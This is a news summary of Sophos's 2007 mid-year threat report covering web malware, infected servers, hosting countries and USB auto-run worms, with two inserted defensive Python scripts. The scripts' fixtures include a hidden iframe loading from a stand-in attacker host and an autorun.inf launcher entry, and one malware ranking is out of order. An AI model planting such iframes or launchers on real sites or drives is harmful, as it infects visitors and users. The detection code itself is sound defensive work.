Threat Report: Record number of Web-borne attacks during 2007

Sophos has published new research into the first six months of cybercrime in 2007. The Sophos Security Threat Report examines existing and emerging security trends and has identified a sharp rise in the number of web threats, as well as the countries and server types hosting the most infected sites.

The first half of 2007 has seen an explosion in threats spread via the web, which has now taken over from email as the preferred vector of attack for financially motivated cybercriminals. Indeed, in June alone Sophos’s global network of monitoring stations uncovered a record number of infected webpages – approximately 29,700 – each day. In contrast, earlier in 2007, the number of malicious pages detected stood as low as just 5,000 per day.

Sophos blocks access to millions of webpages to protect customers from malware and inappropriate content. Taking a snapshot of just one million of those webpages, experts found that 28.8 percent were hosting malware. A further 28.0 percent were blocked due to the adult nature of their content, most commonly because they were pornography or gambling sites. Pages set up by spammers accounted for 19.4 percent, and 4.3 percent were classed as illegal sites, for instance those peddling pirated software or hosting phishing pages. Of the websites containing malicious code, just one in five had been designed specifically for malicious activity, with the remaining 80 percent made up of legitimate sites that have fallen victim to hackers.

Apache is the most compromised server

By compromising a single file on a web server, cybercriminals can easily and quickly cross-contaminate a huge number of websites, as the infected file may form part of a plethora of unrelated pages, all of which are published from the same server.

The breakdown of the world’s top server types affected by web threats in the first six months of 2007 reads as follows:

1.    Apache              51.0%
2.    Microsoft IIS 6     34.0%
3.    Microsoft IIS 5      9.0%
4.    nginx                3.0%

      Other                3.0%

The fact that more than half of all infected web pages were hosted on Apache servers demonstrates that infection is not simply a Windows problem. Earlier this year, during a global ObfJS attack, in which legitimate sites were compromised so that they could serve up malicious code, 98 percent of affected servers were running Apache – many of which were hosted on UNIX rather than Windows platforms.

“With a whopping 80 percent of all infected webpages found on legitimate sites, it begs the question as to why web hosts are not taking the necessary steps to properly secure their servers,” said Graham Cluley, senior technology consultant at Sophos. “Simple measures such as keeping up to date with security patches will go a long way towards thwarting this problem – the fewer holes in server setups, the lower the risk of infection. Web hosts that are currently not behaving responsibly must bite the bullet and take better care of their sites. Just using Apache on your web server doesn’t mean you are now bullet-proof from hackers trying to plant malicious code on your site. It will be a wake-up call for some to see that malware is not just a Microsoft problem.”

Top web-based threats of 2007 – so far

The top ten list of web-based malware hosted on these infected sites during the first six months of 2007 reads as follows:

1.    Mal/Iframe          49.2%
2.    Troj/Fujif           7.9%
3.    JS/EncIFra           7.3%
4.    Troj/Psyme           8.3%
5.    Troj/Decdec          6.9%
6.    Troj/Ifradv          4.1%
7.    Mal/ObfJS            2.5%
8.    Mal/Packer           1.5%
9.    VBS/Redlof           1.1%
10.   Mal/FunDF            0.9%

      Other               10.3%

Mal/Iframe, which works by injecting malicious code onto web pages, dominates this chart, accounting for almost half of the world’s infected URLs. Furthermore, it shows no sign of abating – in a recent potent attack, more than 10,000 web pages were infected, the majority of which were on legitimate webpages hosted by one of Italy’s largest ISPs.
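The injection described above, and the cross-contamination mechanism from the Apache section (one compromised file that is built into many unrelated pages), can be checked for from the defender's side by looking at rendered pages for iframes that are deliberately invisible. The following Python script is an added example and is not Sophos code: it flags iframes rendered at zero size or hidden by inline CSS, then groups them by source across a site's pages, so that a single source turning up on many pages points at a compromised shared include rather than per-page tampering. The site, page contents and hostnames (pottery.example, attacker.invalid, video.example.com) are constructed placeholders.

```python
"""Flag hidden <iframe> elements of the kind Mal/Iframe injects into pages.

Added illustration for this report, not Sophos code. All sample HTML and
hostnames below are constructed placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed site: three rendered pages, two of which share a footer include
# carrying an injected zero-size iframe. The visible video embed on the front
# page is legitimate and must NOT be flagged.
SITE_HOST = "pottery.example"
PAGES = {
    "/index.html": """<html><body><h1>Glazing tips</h1>
<iframe src="https://video.example.com/embed/123" width="560" height="315"></iframe>
<div id="footer"><iframe src="http://attacker.invalid/load.php" width="0" height="0"
 style="visibility:hidden"></iframe></div></body></html>""",
    "/kilns.html": """<html><body><p>Kiln schedule.</p>
<div id="footer"><iframe src="http://attacker.invalid/load.php" width="0" height="0"
 style="visibility:hidden"></iframe></div></body></html>""",
    "/contact.html": """<html><body><p>Email us.</p>
<div id="footer">Copyright</div></body></html>""",
}


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_zero(value):
    """True for '0', '0px', ' 0 ': a dimension that renders nothing."""
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2].strip()
    return v.isdigit() and int(v) == 0


def suspicious_iframes(html, site_host):
    """Return [(src, reasons)] for iframes that are rendered invisibly.

    An iframe is reported when it has zero width/height or is hidden by
    inline CSS. Whether its src is off-site is appended as context only:
    a visible off-site embed such as a video player is normal.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        reasons = []
        if _is_zero(attrs.get("width", "1")) or _is_zero(attrs.get("height", "1")):
            reasons.append("zero-size")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden-by-css")
        if not reasons:
            continue
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        if host and host != site_host:
            reasons.append("off-site:" + host)
        findings.append((src, reasons))
    return findings


def scan_site(pages, site_host):
    """Map each suspicious iframe src to the pages it appears on.

    Many pages sharing one src is the signature of a compromised shared
    include (footer, template, script) rather than per-page tampering.
    """
    by_src = {}
    for path, html in pages.items():
        for src, _reasons in suspicious_iframes(html, site_host):
            by_src.setdefault(src, []).append(path)
    return by_src


if __name__ == "__main__":
    for src, paths in scan_site(PAGES, SITE_HOST).items():
        print(f"{src} injected on {len(paths)} page(s): {', '.join(paths)}")
```

Run against a crawl of your own rendered pages rather than the source templates: the injected markup is only visible once the compromised include has been pulled in, and grouping by src is what tells you which include to look at first.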

“Mal/Iframe is a textbook example of a spawning web threat that targets and exploits vulnerable sites regardless of whether the content is about pottery or pornography,” continued Cluley. “Web security solutions must go beyond blocking websites based simply on category – a gambling site may seem more of a threat, but sometimes the most innocuous sounding site can pose the greatest danger.”

Most infected webpages hosted in China

The top ten list of countries hosting malware-infected web pages during the first half of 2007 reads as follows:

1.    China               53.9%
2.    United States       27.2%
3.    Russia               4.5%
4.    Germany              3.5%
5.    Ukraine              1.2%
6.    France               1.1%
7.    Canada               0.8%
8.    United Kingdom       0.7%
9=    Taiwan               0.6%
9=    South Korea          0.6%

      Other                5.9%

China, which at the end of 2006 hosted just over a third of all malware, has now overtaken the US, and in the first six months of 2007 was responsible for hosting more than half of all web threats reported to Sophos in this period. China’s dramatic rise in the chart is primarily due to widespread Mal/Iframe infections on Chinese hosted web pages. In fact, more than 80 percent of the country’s compromised web pages are infected with this malware.

Hackers turn to USB keys and PDFs to commit cybercrimes

The first half of 2007 has seen a resurgence in the spread of malware via removable drives: no longer the floppy disk that was the vector of virus distribution in the early 1990s, but USB memory sticks. Using this method, hackers take advantage of users who have auto-run enabled on their Windows PC, so that code executes automatically as soon as the stick is attached to the computer. A notable example this year is the LiarVB-A worm, which spread information about AIDS and HIV via USB keys.
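The auto-run behaviour the paragraph describes is driven by an autorun.inf file at the root of the drive, so inspecting that file before a stick is opened is a cheap defensive check. The Python below is an added example and is not Sophos code: it parses autorun.inf and lists the directives (open=, shellexecute= and shell\verb\command=) that would cause Windows to execute a program. Both sample files, and the file names in them, are constructed.

```python
"""Inspect an autorun.inf for directives that would run a program on insert.

Added illustration for this report, not Sophos code. The sample file
contents below are constructed.
"""
import re

# Constructed examples: a benign file that only sets a label and icon, and
# one that would launch a program the moment the drive is mounted.
BENIGN_INF = """[autorun]
label=Conference USB
icon=brand.ico
"""
LAUNCHER_INF = """\ufeff[AutoRun]
; comment line
OPEN=setup.exe /silent
shell\\install\\command=bin\\run.exe
shell=install
UseAutoPlay=1
label=Conference USB
"""

# Directives that hand a command line straight to Windows for execution.
EXEC_KEYS = ("open", "shellexecute")


def parse_inf(text):
    """Return {section: {key: value}} with lower-cased section and key names.

    Hand-rolled rather than configparser because autorun.inf files seen in
    practice carry BOMs, mixed-case section names and repeated keys.
    """
    sections, current = {}, None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def execution_directives(text):
    """Return the list of (key, command) entries that would execute code.

    Covers open=, shellexecute= and any shell\\<verb>\\command= entry; the
    latter runs when the verb is made the default with shell=<verb> or is
    chosen from the drive's context menu.
    """
    auto = parse_inf(text).get("autorun", {})
    hits = [(k, v) for k, v in auto.items() if k in EXEC_KEYS]
    hits += [(k, v) for k, v in auto.items()
             if re.fullmatch(r"shell\\[^\\]+\\command", k)]
    return hits


def should_block(text):
    """True when the file would launch anything. Such a drive should only be
    opened on a host with auto-run disabled, with the listed files examined."""
    return bool(execution_directives(text))


if __name__ == "__main__":
    for name, inf in (("benign", BENIGN_INF), ("launcher", LAUNCHER_INF)):
        print(name, "block" if should_block(inf) else "allow", execution_directives(inf))
```

Disabling auto-run on the host (on Windows systems of this era, the NoDriveTypeAutoRun policy value set to 0xFF turns it off for every drive type) removes the execution path altogether; the listing is still useful in incident response to learn what an unknown stick was set up to launch.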

“USB sticks are a growing concern for businesses – they are mass produced, cheap and therefore the perfect choice for tradeshow goody-bags and marketing departments keen to swap prizes for sales leads,” continued Cluley. “Users must tread carefully when it comes to unknown drives – even if it’s been freshly purchased from a shop, as you don’t know what you might be plugging into your network.”

Another new tactic employed by cybercriminals during this period has been the use of PDF attachments in spam messages. To evade less sophisticated gateway filtering products, spammers are increasingly sending PDF files that carry a graphical version of their marketing message, in their attempt to reach potential customers.

Email still a cause for concern

Email threats continue to cause concern for businesses and, although they have been eclipsed by web-based threats, the actual amount of email-borne malware has remained constant during the past year. The proportion of infected email during the first half of 2007 was 1 in 337, or 0.29 percent of all messages. More than 8,000 new versions of the Mal/HckPk threat were seen during 2007, as it was used to disguise widespread email attacks like Dref and Dorf.
